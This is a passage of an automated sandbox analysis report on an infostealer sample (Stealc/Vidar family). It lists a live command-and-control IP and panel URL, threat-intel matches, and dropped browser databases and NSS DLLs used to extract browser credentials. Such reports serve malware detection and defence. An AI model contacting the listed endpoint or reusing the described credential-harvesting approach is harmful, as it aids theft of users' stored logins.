https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllo	file.exe, 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php:	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org	FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521305
Start date and time:	2024-09-28 07:31:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	bind.aspx.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAEBAFBGIDHCBFHIECFCBGHIEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAKJDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGIDHIIJKEBGHJJKFIDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBKFCFBFIDGCGDHJDBKFHCFBGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIDHIEBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJKJEHJKJEBGHJJKEBGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\IIJJDGHJKKJEBFHJDBGHDBKFIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJECBAAAFHIIEBFCBKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: bind.aspx.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
